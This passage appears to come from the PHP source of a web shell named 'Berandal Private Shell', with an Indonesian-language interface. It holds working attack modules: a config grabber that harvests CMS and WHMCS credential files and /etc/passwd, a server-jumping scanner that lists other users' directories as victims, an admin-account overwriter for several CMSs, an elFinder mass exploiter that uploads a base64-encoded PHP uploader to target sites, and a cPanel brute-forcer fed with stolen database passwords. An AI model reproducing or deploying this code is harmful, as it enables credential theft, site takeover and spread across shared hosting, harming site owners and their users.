  2458.                     "/home3/$user_os/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2459.                     "/home3/$user_os/public_html/clientarea/configuration.php" => "WHMCS",                
  2460.                     "/home3/$user_os/public_html/whmcs/configuration.php" => "WHMCS",
  2461.                     "/home3/$user_os/public_html/forum/config.php" => "phpBB",
  2462.                     "/home3/$user_os/public_html/sites/default/settings.php" => "Drupal",
  2463.                     "/home3/$user_os/public_html/config/settings.inc.php" => "PrestaShop",
  2464.                     "/home3/$user_os/public_html/app/etc/local.xml" => "Magento",
  2465.                     "/home3/$user_os/public_html/admin/config.php" => "OpenCart",
  2466.                     "/home3/$user_os/public_html/slconfig.php" => "Sitelok",
  2467.                     "/home3/$user_os/public_html/application/config/database.php" => "Ellislab",                  
  2468.                     "/home3/$user_os/public_html/whm/configuration.php" => "WHMCS",
  2469.                     "/home3/$user_os/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2470.                     "/home3/$user_os/public_html/central/configuration.php" => "WHM Central",
  2471.                     "/home3/$user_os/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2472.                     "/home3/$user_os/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2473.                     "/home3/$user_os/public_html/submitticket.php" => "WHMCS",                                        
  2474.                     "/home3/$user_os/public_html/configuration.php" => "Joomla",                  
  2475.                     "/home3/$user_os/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2476.                     "/home3/$user_os/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2477.                     "/home3/$user_os/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2478.                     "/home3/$user_os/public_html/Home/configuration.php" => "JoomlaHome",
  2479.                     "/home3/$user_os/public_html/HOME/configuration.php" => "JoomlaHome",
  2480.                     "/home3/$user_os/public_html/home/configuration.php" => "JoomlaHome",
  2481.                     "/home3/$user_os/public_html/NEW/configuration.php" => "JoomlaNew",
  2482.                     "/home3/$user_os/public_html/New/configuration.php" => "JoomlaNew",
  2483.                     "/home3/$user_os/public_html/new/configuration.php" => "JoomlaNew",
  2484.                     "/home3/$user_os/public_html/News/configuration.php" => "JoomlaNews",
  2485.                     "/home3/$user_os/public_html/NEWS/configuration.php" => "JoomlaNews",
  2486.                     "/home3/$user_os/public_html/news/configuration.php" => "JoomlaNews",
  2487.                     "/home3/$user_os/public_html/Cms/configuration.php" => "JoomlaCms",
  2488.                     "/home3/$user_os/public_html/CMS/configuration.php" => "JoomlaCms",
  2489.                     "/home3/$user_os/public_html/cms/configuration.php" => "JoomlaCms",
  2490.                     "/home3/$user_os/public_html/Main/configuration.php" => "JoomlaMain",
  2491.                     "/home3/$user_os/public_html/MAIN/configuration.php" => "JoomlaMain",
  2492.                     "/home3/$user_os/public_html/main/configuration.php" => "JoomlaMain",
  2493.                     "/home3/$user_os/public_html/Blog/configuration.php" => "JoomlaBlog",
  2494.                     "/home3/$user_os/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2495.                     "/home3/$user_os/public_html/blog/configuration.php" => "JoomlaBlog",
  2496.                     "/home3/$user_os/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2497.                     "/home3/$user_os/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2498.                     "/home3/$user_os/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2499.                     "/home3/$user_os/public_html/beta/configuration.php" => "JoomlaBeta",
  2500.                     "/home3/$user_os/public_html/Beta/configuration.php" => "JoomlaBeta",
  2501.                     "/home3/$user_os/public_html/BETA/configuration.php" => "JoomlaBeta",
  2502.                     "/home3/$user_os/public_html/PRESS/configuration.php" => "JoomlaPress",
  2503.                     "/home3/$user_os/public_html/Press/configuration.php" => "JoomlaPress",
  2504.                     "/home3/$user_os/public_html/press/configuration.php" => "JoomlaPress",
  2505.                     "/home3/$user_os/public_html/Wp/configuration.php" => "JoomlaWp",
  2506.                     "/home3/$user_os/public_html/wp/configuration.php" => "JoomlaWp",
  2507.                     "/home3/$user_os/public_html/WP/configuration.php" => "JoomlaWP",
  2508.                     "/home3/$user_os/public_html/portal/configuration.php" => "JoomlaPortal",
  2509.                     "/home3/$user_os/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2510.                     "/home3/$user_os/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2511.                     "/home3/$user_os/public_html/wp-config.php" => "WordPress",
  2512.                     "/home3/$user_os/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2513.                     "/home3/$user_os/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2514.                     "/home3/$user_os/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",        
  2515.                     "/home3/$user_os/public_html/Home/wp-config.php" => "WordPressHome",
  2516.                     "/home3/$user_os/public_html/HOME/wp-config.php" => "WordPressHome",
  2517.                     "/home3/$user_os/public_html/home/wp-config.php" => "WordPressHome",
  2518.                     "/home3/$user_os/public_html/NEW/wp-config.php" => "WordPressNew",
  2519.                     "/home3/$user_os/public_html/New/wp-config.php" => "WordPressNew",
  2520.                     "/home3/$user_os/public_html/new/wp-config.php" => "WordPressNew",
  2521.                     "/home3/$user_os/public_html/News/wp-config.php" => "WordPressNews",
  2522.                     "/home3/$user_os/public_html/NEWS/wp-config.php" => "WordPressNews",
  2523.                     "/home3/$user_os/public_html/news/wp-config.php" => "WordPressNews",
  2524.                     "/home3/$user_os/public_html/Cms/wp-config.php" => "WordPressCms",
  2525.                     "/home3/$user_os/public_html/CMS/wp-config.php" => "WordPressCms",
  2526.                     "/home3/$user_os/public_html/cms/wp-config.php" => "WordPressCms",
  2527.                     "/home3/$user_os/public_html/Main/wp-config.php" => "WordPressMain",
  2528.                     "/home3/$user_os/public_html/MAIN/wp-config.php" => "WordPressMain",
  2529.                     "/home3/$user_os/public_html/main/wp-config.php" => "WordPressMain",
  2530.                     "/home3/$user_os/public_html/Blog/wp-config.php" => "WordPressBlog",
  2531.                     "/home3/$user_os/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2532.                     "/home3/$user_os/public_html/blog/wp-config.php" => "WordPressBlog",
  2533.                     "/home3/$user_os/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2534.                     "/home3/$user_os/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2535.                     "/home3/$user_os/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2536.                     "/home3/$user_os/public_html/beta/wp-config.php" => "WordPressBeta",
  2537.                     "/home3/$user_os/public_html/Beta/wp-config.php" => "WordPressBeta",
  2538.                     "/home3/$user_os/public_html/BETA/wp-config.php" => "WordPressBeta",
  2539.                     "/home3/$user_os/public_html/PRESS/wp-config.php" => "WordPressPress",
  2540.                     "/home3/$user_os/public_html/Press/wp-config.php" => "WordPressPress",
  2541.                     "/home3/$user_os/public_html/press/wp-config.php" => "WordPressPress",
  2542.                     "/home3/$user_os/public_html/Wp/wp-config.php" => "WordPressWp",
  2543.                     "/home3/$user_os/public_html/wp/wp-config.php" => "WordPressWp",
  2544.                     "/home3/$user_os/public_html/WP/wp-config.php" => "WordPressWP",
  2545.                     "/home3/$user_os/public_html/portal/wp-config.php" => "WordPressPortal",
  2546.                     "/home3/$user_os/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2547.                     "/home3/$user_os/public_html/Portal/wp-config.php" => "WordPressPortal"                  
  2548.                         );  
  2549.                     foreach($grab_config as $config => $nama_config) {
  2550.                         $ambil_config = file_get_contents($config);
  2551.                         if($ambil_config == '') {
  2552.                         } else {
  2553.                             $file_config = fopen("os_config/$user_os-$nama_config.txt","w");
  2554.                             fputs($file_config,$ambil_config);
  2555.                         }
  2556.                     }
  2557.                 }      
  2558.             }
  2559.             echo "<center><a href='?dir=$dir/os_config'><font color=white>Selese Cok!</font></a></center>";
  2560.             }else{
  2561.                
  2562.         echo "<div class='mybox'><form method=\"post\" action=\"\"><center><h1>Config Grabber</h1><hr color='white'><br>etc/passw ( Error ? <a href='?dir=$dir&666=passwbypass'>Bypass di sini!</a> )<br><br><textarea name=\"passwd\" class='area' style='border-color=white;' rows='15' cols='60'>\n";
  2563.         echo file_get_contents('/etc/passwd');
  2564.         echo "</textarea><br><br><input type=\"submit\"  style='border-color:white; text-align:center' class='kotak' value=\"SIKAT!\"></td></tr></center></div>\n";
  2565.         }
  2566. } elseif($_GET['666'] == 'lompat_indah') {
  2567.     $i = 0;
  2568.     echo "<pre><div class='margin: 5px auto; mybox'><h1>Lompat Indah [Jumping Server]</h1><hr color='white'>";
  2569.     $etc = fopen("/etc/passwd", "r");
  2570.     while($passwd = fgets($etc)) {
  2571.         if($passwd == '' || !$etc) {
  2572.             echo "<font color=red>Can't read /etc/passwd</font>";
  2573.         } else {
  2574.             preg_match_all('/(.*?):x:/', $passwd, $user_lompat_indah);
  2575.             foreach($user_lompat_indah[1] as $user_os_jump) {
  2576.                 $user_lompat_indah_dir = "/home/$user_os_jump/public_html";
  2577.                 if(is_readable($user_lompat_indah_dir)) {
  2578.                     $i++;
  2579.                     $jrw = "[<font color=white>R</font>] <a href='?dir=$user_lompat_indah_dir'><font color=white>$user_lompat_indah_dir</font></a><br>";
  2580.                     if(is_writable($user_lompat_indah_dir)) {
  2581.                         $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_lompat_indah_dir'><font color=white>$user_lompat_indah_dir</font></a><br>";
  2582.                     }
  2583.                     echo $jrw;
  2584.                     $domain_jump = file_get_contents("/etc/named.conf");    
  2585.                     if($domain_jump == '') {
  2586.                         echo " => ( <font color=red>gabisa ambil nama domain nya cok !!</font> )<br>";
  2587.                     } else {
  2588.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2589.                         foreach($domains_jump[1] as $dj) {
  2590.                             $user_lompat_indah_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2591.                             $user_lompat_indah_url = $user_lompat_indah_url['name'];
  2592.                             if($user_lompat_indah_url == $user_os_jump) {
  2593.                                 echo " => ( <u>$dj</u> )<br>";
  2594.                                 break;
  2595.                             }
  2596.                         }
  2597.                     }
  2598.                 }
  2599.             }
  2600.         }
  2601.     }
  2602.     if($i == 0) {
  2603.     } else {
  2604.         echo "<br>Total ada ".$i." Calon Korban di ".gethostbyname($_SERVER['HTTP_HOST'])." :v";
  2605.     }
  2606.     echo "</div></pre>";
  2607. } elseif($_GET['666'] == 'auto_edit_user') {
  2608.     if($_POST['sikat']) {
  2609.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2610.             echo "username atau password harus lebih dari 6 karakter";
  2611.         } else {
  2612.             $user_baru = $_POST['user_baru'];
  2613.             $pass_baru = md5($_POST['pass_baru']);
  2614.             $conf = $_POST['config_dir'];
  2615.             $scan_conf = scandir($conf);
  2616.             foreach($scan_conf as $file_conf) {
  2617.                 if(!is_file("$conf/$file_conf")) continue;
  2618.                 $config = file_get_contents("$conf/$file_conf");
  2619.                 if(preg_match("/JConfig|joomla/",$config)) {
  2620.                     $dbhost = ambilkata($config,"host = '","'");
  2621.                     $dbuser = ambilkata($config,"user = '","'");
  2622.                     $dbpass = ambilkata($config,"password = '","'");
  2623.                     $dbname = ambilkata($config,"db = '","'");
  2624.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2625.                     $prefix = $dbprefix."users";
  2626.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2627.                     $db = mysql_select_db($dbname);
  2628.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2629.                     $result = mysql_fetch_array($q);
  2630.                     $id = $result['id'];
  2631.                     $site = ambilkata($config,"sitename = '","'");
  2632.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2633.                     echo "Config => ".$file_conf."<br>";
  2634.                     echo "CMS => Joomla<br>";
  2635.                     if($site == '') {
  2636.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya cok !!</font><br>";
  2637.                     } else {
  2638.                         echo "Sitename => $site<br>";
  2639.                     }
  2640.                     if(!$update OR !$conn OR !$db) {
  2641.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2642.                     } else {
  2643.                         echo "Status => <font color=lime>sukses edit user cok, sana login pake user & pass baru.</font><br><br>";
  2644.                     }
  2645.                     mysql_close($conn);
  2646.                 } elseif(preg_match("/WordPress/",$config)) {
  2647.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2648.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2649.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2650.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2651.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2652.                     $prefix = $dbprefix."users";
  2653.                     $option = $dbprefix."options";
  2654.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2655.                     $db = mysql_select_db($dbname);
  2656.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2657.                     $result = mysql_fetch_array($q);
  2658.                     $id = $result[ID];
  2659.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2660.                     $result2 = mysql_fetch_array($q2);
  2661.                     $target = $result2[option_value];
  2662.                     if($target == '') {
  2663.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2664.                     } else {
  2665.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2666.                     }
  2667.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2668.                     echo "Config => ".$file_conf."<br>";
  2669.                     echo "CMS => Wordpress<br>";
  2670.                     echo $url_target;
  2671.                     if(!$update OR !$conn OR !$db) {
  2672.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2673.                     } else {
  2674.                         echo "Status => <font color=lime>sukses edit user cok, sana login pake user & pass baru.</font><br><br>";
  2675.                     }
  2676.                     mysql_close($conn);
  2677.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2678.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2679.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2680.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2681.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2682.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2683.                     $prefix = $dbprefix."admin_user";
  2684.                     $option = $dbprefix."core_config_data";
  2685.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2686.                     $db = mysql_select_db($dbname);
  2687.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2688.                     $result = mysql_fetch_array($q);
  2689.                     $id = $result[user_id];
  2690.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2691.                     $result2 = mysql_fetch_array($q2);
  2692.                     $target = $result2[value];
  2693.                     if($target == '') {
  2694.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2695.                     } else {
  2696.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2697.                     }
  2698.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2699.                     echo "Config => ".$file_conf."<br>";
  2700.                     echo "CMS => Magento<br>";
  2701.                     echo $url_target;
  2702.                     if(!$update OR !$conn OR !$db) {
  2703.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2704.                     } else {
  2705.                         echo "Status => <font color=lime>sukses edit user cok, silakan login dengan user & pass yang baru.</font><br><br>";
  2706.                     }
  2707.                     mysql_close($conn);
  2708.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2709.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2710.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2711.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2712.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2713.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2714.                     $prefix = $dbprefix."user";
  2715.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2716.                     $db = mysql_select_db($dbname);
  2717.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2718.                     $result = mysql_fetch_array($q);
  2719.                     $id = $result[user_id];
  2720.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  2721.                     if($target == '') {
  2722.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2723.                     } else {
  2724.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2725.                     }
  2726.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2727.                     echo "Config => ".$file_conf."<br>";
  2728.                     echo "CMS => OpenCart<br>";
  2729.                     echo $url_target;
  2730.                     if(!$update OR !$conn OR !$db) {
  2731.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2732.                     } else {
  2733.                         echo "Status => <font color=lime>sukses edit user cok, sana login pake user & pass yang baru.</font><br><br>";
  2734.                     }
  2735.                     mysql_close($conn);
  2736.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2737.                     $dbhost = ambilkata($config,'server = "','"');
  2738.                     $dbuser = ambilkata($config,'username = "','"');
  2739.                     $dbpass = ambilkata($config,'password = "','"');
  2740.                     $dbname = ambilkata($config,'database = "','"');
  2741.                     $prefix = "users";
  2742.                     $option = "identitas";
  2743.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2744.                     $db = mysql_select_db($dbname);
  2745.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2746.                     $result = mysql_fetch_array($q);
  2747.                     $target = $result[alamat_website];
  2748.                     if($target == '') {
  2749.                         $target2 = $result[url];
  2750.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2751.                         if($target2 == '') {
  2752.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2753.                         } else {
  2754.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  2755.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2756.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2757.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2758.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2759.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2760.                             } else {
  2761.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2762.                             }
  2763.                         }
  2764.                     } else {
  2765.                         $cek_login = file_get_contents("$target/adminweb/");
  2766.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2767.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2768.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2769.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2770.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2771.                         } else {
  2772.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2773.                         }
  2774.                     }
  2775.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2776.                     echo "Config => ".$file_conf."<br>";
  2777.                     echo "CMS => Lokomedia<br>";
  2778.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2779.                         echo $url_target2;
  2780.                     } else {
  2781.                         echo $url_target;
  2782.                     }
  2783.                     if(!$update OR !$conn OR !$db) {
  2784.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2785.                     } else {
  2786.                         echo "Status => <font color=lime>sukses edit user CoK, sana login pake user & pass baru.</font><br><br>";
  2787.                     }
  2788.                     mysql_close($conn);
  2789.                 }
  2790.             }
  2791.         }
  2792.     } else {
  2793.         echo "<div style='text-align:left' class='mybox'>
  2794.         <h1>Auto Edit User Config</h1><hr color='white'>
  2795.         <form method='post'>
  2796.         DIR Config:&nbsp&nbsp&nbsp&nbsp&nbsp
  2797.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='config_dir' value='$dir'><br><br>
  2798.         Set User & Pass:
  2799.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='user_baru' value='berandal' placeholder='user_baru'><br>
  2800.         &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp
  2801.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='pass_baru' value='berandal' placeholder='pass_baru'><br><br>
  2802.         &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp
  2803.         <input type='submit' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' name='sikat' class='kotak' value='SIKAT!'>
  2804.         </form>
  2805.         <span>
  2806.         NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/berandal_config )</span></div>
  2807.         ";
  2808.     }
  2809. }elseif($_GET['666'] == 'elfinder') {
  2810. echo "<div class='mybox'>";
  2811. echo '<h1>elFinder Mass Exploiter</h1>';
  2812. echo '<form method="post">
  2813. Target: <br>
  2814. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize:
  2815. none;"></textarea><br>
  2816. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="SIKAT!">
  2817. </form>';
  2818. echo "</div>";
  2819. function ngirim($url, $isi) {
  2820. $ch = curl_init ("$url");
  2821.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  2822.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  2823.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2824.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2825.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2826.       curl_setopt ($ch, CURLOPT_POST, 1);
  2827.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  2828.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  2829.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  2830. $data3 = curl_exec ($ch);
  2831. return $data3;
  2832. }
  2833. $target = explode("\r\n", $_POST['target']);
  2834. if($_POST['x']) {
  2835.     foreach($target as $korban) {
  2836.         $nama_doang = "berandal.php";
  2837.         $isi_nama_doang =
  2838. "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1
  2839. lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV
  2840. 0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  2841.         $decode_isi = base64_decode($isi_nama_doang);
  2842.         $encode = base64_encode($nama_doang);
  2843.         $fp = fopen($nama_doang,"w");
  2844.         fputs($fp, $decode_isi);
  2845.         echo "[!] <a href='$korban' target='_blank'>$korban</a> <br>";
  2846.         echo "# Upload[1] ......<br>";
  2847.         $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  2848.         $b = file_get_contents("$url_mkfile");
  2849.         $post1 = array(
  2850.                 "cmd" => "put",
  2851.                 "target" => "l1_$encode",
  2852.                 "content" => "$decode_isi",
  2853.                 );
  2854.         $post2 = array(
  2855.                 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  2856.                 "upload[]" => "@$nama_doang",);
  2857.         $output_mkfile = ngirim("$korban", $post1);
  2858.         if(preg_match("/$nama_doang/", $output_mkfile)) {
  2859.             echo "<font color='lime'># Upload Sukses 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...</font><br><br>";
  2860.         } else {
  2861.             echo "<font color='red'># Upload Gagal Cok! 1 <br># Uploading 2..</font><br>";
  2862.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  2863.             if(preg_match("/$nama_doang/", $upload_ah)) {
  2864.                 echo "<font color='lime'># Upload Sukses 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...</font><br><br>";
  2865.             } else {
  2866.                 echo "<font color='red'># Upload Gagal Lagi Cok! 2</font><br><br>";
  2867.             }
  2868.         }
  2869.     }
  2870. }
  2871. }
  2872. elseif($_GET['666'] == 'cpanel') {
  2873.     if($_POST['crack']) {
  2874.         $usercp = explode("\r\n", $_POST['user_cp']);
  2875.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2876.         $i = 0;
  2877.         foreach($usercp as $ucp) {
  2878.             foreach($passcp as $pcp) {
  2879.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2880.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2881.                     } else {
  2882.                         $_SESSION[$ucp] = "1";
  2883.                         $_SESSION[$pcp] = "1";
  2884.                         $i++;
  2885.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2886.                     }
  2887.                 }
  2888.             }
  2889.         }
  2890.         if($i == 0) {
  2891.         } else {
  2892.             echo "<br>Sukses nyolong ".$i." Cpanel by <font color=white>Berandal Private Shell</font>";
  2893.         }
  2894.     } else {
  2895.         echo "<center class='mybox'><h1>Cpanel Cracker</h1><hr color='white'>
  2896.         <form method='post'>
  2897.         USER: <br>
  2898.         <textarea style='width: 450px; height: 150px; border-color=white' name='user_cp'>";
  2899.         $_usercp = fopen("/etc/passwd","r");
  2900.         while($getu = fgets($_usercp)) {
  2901.             if($getu == '' || !$_usercp) {
  2902.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2903.             } else {
  2904.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2905.                 foreach($u[1] as $user_cp) {
  2906.                         if(is_dir("/home/$user_cp/public_html")) {
  2907.                             echo "$user_cp\n";
  2908.                     }
  2909.                 }
  2910.             }
  2911.         }
  2912.         echo "</textarea><br>
  2913.         PASS: <br>
  2914.         <textarea style='width: 450px; height: 200px; border-color=white' name='pass_cp'>";
  2915.         function cp_pass($dir) {
  2916.             $pass = "";
  2917.             $dira = scandir($dir);
  2918.             foreach($dira as $dirb) {
  2919.                 if(!is_file("$dir/$dirb")) continue;
  2920.                 $ambil = file_get_contents("$dir/$dirb");
  2921.                 if(preg_match("/WordPress/", $ambil)) {
  2922.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2923.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2924.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2925.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2926.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2927.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2928.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2929.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2930.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2931.                 } elseif(preg_match("/client/", $ambil)) {
  2932.                     preg_match("/password=(.*)/", $ambil, $pass1);
  2933.                     if(preg_match('/"/', $pass1[1])) {
  2934.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2935.                         $pass .= $pass1[1]."\n";
  2936.                     }
  2937.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2938.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2939.                 }
  2940.             }
  2941.             echo $pass;
  2942.         }
  2943.         $cp_pass = cp_pass($dir);
  2944.         echo $cp_pass;
  2945.         echo "</textarea><br>
  2946.         <input type='submit' name='crack' style='width: 450px; border-color=white' class='kotak' value='Crack'>
  2947.         </form>
  2948.         <span>NB: CPanel Crack ini udah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/os_config )</span><br></center>";
  2949.     }
  2950. }
  2951. elseif($_GET['666'] == 'sec') {
  2952. echo '<h1>Safe Mode</h1>';
  2953.     echo '<div class="content">';
